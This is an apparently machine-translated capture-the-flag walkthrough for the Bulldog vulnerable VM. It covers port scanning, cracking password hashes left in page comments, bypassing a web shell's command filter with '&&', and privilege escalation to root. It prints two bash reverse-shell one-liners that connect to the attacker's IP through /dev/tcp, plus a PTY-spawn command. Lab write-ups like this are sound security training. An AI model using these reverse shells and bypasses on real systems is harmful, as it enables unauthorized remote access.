0x00 environment construction
Get root permission to read flag
Target VM virtual machine startup
Attack machine kali win10
Target ip problem
(1) Set nat mode to the same network segment as kali
(2) If it is set to nat, kali can't scan the target ip. Try this
 Restart the target to the startup page and select the advanced option of the second ubuntu.
 Continue to select the second option
 Select root and press enter to enter command line mode
 mount -o rw,remount /
 ifconfig -a displays the information of all network cards, including those not up
 vim /etc/network/interfaces modify the network card name
 All changed to 33
 To kali scan network segment test
If you have any questions, try again
I changed it at first, but I still didn't respond. I tried it several times, but I still couldn't,
Then delete the target file, re import the target, and modify the ip again.
0x01 information collection
netdiscover -i eth0 -r 192.168.157.0/24
Port and service identification
masscan -p 1-65535 --rate=1000 192.168.157.161 nmap -A -sC -sV -p 80,23,8080 192.168.157.161 -o port.tx
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 16:34 CST Nmap scan report for 192.168.157.161 Host is up (0.00042s latency). PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA) | 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA) |_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519) 80/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries 8080/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries MAC Address: 00:0C:29:27:6E:D6 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.42 ms 192.168.157.161 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; proto
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
OS details: Linux 3.2 - 4.9
0x02 vulnerability mining
web vulnerability thinking
(1) Blast the directory to see the functions and source code of various web pages to find loopholes
(2) See whether there are cms and other framework vulnerabilities for direct utilization.
If there is no manual bp search, you can also start awvs appscan xray scanning.
ssh utilization ideas
(1) Use Hydra to run weak passwords. If there is a user name, you need to see whether there is a weak password in the dictionary.
(2) The account and password obtained from the web can also be tried. It is likely to be an ssh password.
Step 1: browse the web directory
(1) kali and win10 blasting tools
/admin/login / login box
(2) Browse the home page and click on each point
Click only one / notice / no utilization point
(3) Look at the exploded page
/The admin/login / page is a login box made by Django framework
/robots.txt is useless
/Too many dev contents
Useful information is
Click web shell to jump to
Certification is required to use
Review the / dev source code and find that there is a hash of the useful information password left by the web developer when testing
Attempt to decrypt login
<!--Need these password hashes for testing. Django's default is too complex--> <!--We'll remove these in prod. It's not like a hacker can do anything with a hash--> Team Lead: firstname.lastname@example.org<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb--> Back-up Team Lead: email@example.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb--> Front End: firstname.lastname@example.org<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279--> Front End: email@example.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9--> Back End: firstname.lastname@example.org<br><!--553d917a396414ab99785694afd51df3a8a8a3e0--> Back End: email@example.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5--> Database: firstname.lastname@example.org<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
Step 2: crack the hash
Finally, the last two passwords are obtained after online decryption
Password bulldog (cmd5)
Password bulldoglover (somd5)
Step 3: log in to the background with password
(1) After logging in with the mailbox @ as the user name and password, it will be displayed that there is no operation permission.
(2) ssh login 23 failed
(3) Think of the web shell access that needs authentication just now
Successful authentication is a command execution interface
Step 4: execute with command (try to bypass the method)
After the test, many commands will be blocked by the web page and try to bypass them
It is tested that the splicing command (allowed) & & (not allowed) can be used to bypass
id not executed
Ls & & ID execute as
Step 5: Bounce shell
ls && bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8080 <&1'
(2) You can also directly use echo to execute the rebound shell
echo "bash -i >& /dev/tcp/192.168.157.137/8080 0>&1" | bash
First try the echo output command and input it into bash.
Both methods can rebound successfully
0x03 lifting authority
Step 6: check the system users and determine the users that need attention
/bin/bash has two users, django and bulldogadmin
Step 7: find each user's file
(1) Look at bulldogadmin first
find / -user bulldogadmin 2>/dev/null
Show only non error
(2 > / dev/null means redirecting the standard error to / dev/null, which is commonly known as a black hole in the empty file of the linux device)
(2) Two files were found in a hidden directory
(3) The note file should be a text file and directly cat printed out
(4) App looks like executing file strings. Print the printable file characters and have a look
Step 8: splicing root password and raising rights
It could be a password
must be run from a terminal
Must run from one terminal
Convert the shell to fully interactive tty terminal mode with the following command
python -c 'import pty; pty.spawn("/bin/bash")'
Error su: Authentication failure
sudo su SUPERultimatePASSWORDyouCANTget
cd .. cat congrats.txt
0x04 summary of ideas
1. Use directory explosion to find a webshell page from the exploded / dev page content, and view the account and password required for authentication in the source code.
2. The operating system commands can be executed by using the webshell page, and direct bash rebound is prohibited. Find a way to bypass echo. First output the command | input it into bash or ls&&id bypass it.
3. Get the shell backward file to see if there are clues such as password.
4. The Su command reports an error must be run from a terminal
python environment can
python -c 'import pty;pty.spawn("/bin/bash")'
Convert the shell to terminal (tty) mode.